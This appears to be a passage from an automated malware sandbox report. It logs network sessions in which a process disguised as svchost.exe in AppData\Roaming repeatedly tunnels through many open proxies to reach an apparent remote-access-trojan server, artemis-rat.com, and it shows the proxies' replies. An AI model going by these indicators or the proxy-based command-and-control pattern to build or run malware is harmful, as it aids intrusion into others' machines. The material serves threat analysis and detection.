                                                                                    2672192.168.2.558640222.255.238.1598043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.223629951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.592251062 CET481INHTTP/1.1 302 Found
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Location: https://ktxcomay.com.vn
                                                                                    Content-Length: 289
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2673192.168.2.555672103.172.42.121808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.229176998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.349014997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.970308065 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2674192.168.2.558673182.106.220.252909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.231522083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.593689919 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2675192.168.2.55869760.190.68.154730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.289218903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.667999029 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2676192.168.2.558655103.49.202.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.291812897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2677192.168.2.55779052.151.210.204900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.292388916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2678192.168.2.55883365.49.38.202312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.295909882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2679192.168.2.55874484.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.296550035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2680192.168.2.5587488.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.296745062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2681192.168.2.558848104.25.58.398043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.307100058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.461679935 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2682192.168.2.558849185.238.228.968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.307296991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.462090015 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2683192.168.2.558712183.230.162.122909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.308271885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.691446066 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2684192.168.2.55879046.51.249.135312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.308566093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.604091883 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2685192.168.2.55777462.85.224.217567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.308829069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2686192.168.2.558829129.213.150.205808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.308830023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2687192.168.2.55781034.87.84.1058043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.308980942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.145809889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.146408081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.146311998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2688192.168.2.55875365.21.255.197312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.311021090 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:31.639352083 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:32.016047955 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2689192.168.2.558779107.175.37.1784302943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.312864065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2690192.168.2.558707116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.316265106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2691192.168.2.55861541.173.24.388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.330658913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333539009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.833749056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833714008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2692192.168.2.55884495.164.207.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.335773945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.561084032 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3661
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ezproxies.com
                                                                                    X-Cache-Lookup: NONE from ezproxies.com:58378
                                                                                    Via: 1.1 ezproxies.com (squid/3.5.20)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2693192.168.2.555878163.47.210.74808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.344435930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.349332094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.442919016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2694192.168.2.5587748.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.347548008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
